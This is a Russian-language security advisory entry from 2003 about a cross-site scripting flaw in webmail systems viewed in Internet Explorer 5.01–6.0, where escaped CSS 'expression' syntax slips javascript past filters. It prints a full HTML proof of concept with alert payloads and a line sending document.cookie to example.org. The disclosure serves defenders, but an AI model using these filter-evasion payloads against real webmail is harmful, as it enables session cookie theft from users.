| Дата публикации: | 04.10.2003 |
| Всего просмотров: | 1495 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Microsoft Internet Explorer 5.01-6.0 в комбинации с Web mail системами
Описание: Уязвимость обнаружена в некоторых Webmail системах в комбинации с Microsoft Internet Explorer. Удаленный атакующий может выполнить произвольный код сценария в почтовом HTML сообщении при его просмотре в Webmail системе, в обход существующих механизмов фильтрации. Удаленный атакующий может вставить произвольный javascript код в таблицу стилей через ключевое слово "expression" используя определенную методику, чтобы обойти существующие механизмы фильтрации javascript кода в большинстве Webmail системах. Уязвимость работает только в Microsoft Internet Explorer. Пример/Эксплоит:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
<title>Webmail test</title>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
</head>
<body style="width:expres\sion(alert(1))">
<style type="text/css">
h1 {
he\ight:e\xpression(alert(2));
bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+$
}
</style>
<h1 style="width:expression(alert(3))">...</h1>
<div id="just-for-fun">
<a href="javascript:window.open(document.location);"
onmouseover="alert(4)">fireworks</a>
</div>
</body>
</html>
Решение: Не используйте IE для просмотра HTML почтовых сообщений в Web mail системах. |
|
| Ссылки: | Webmails + Internet Explorer can create unwanted javascript execution |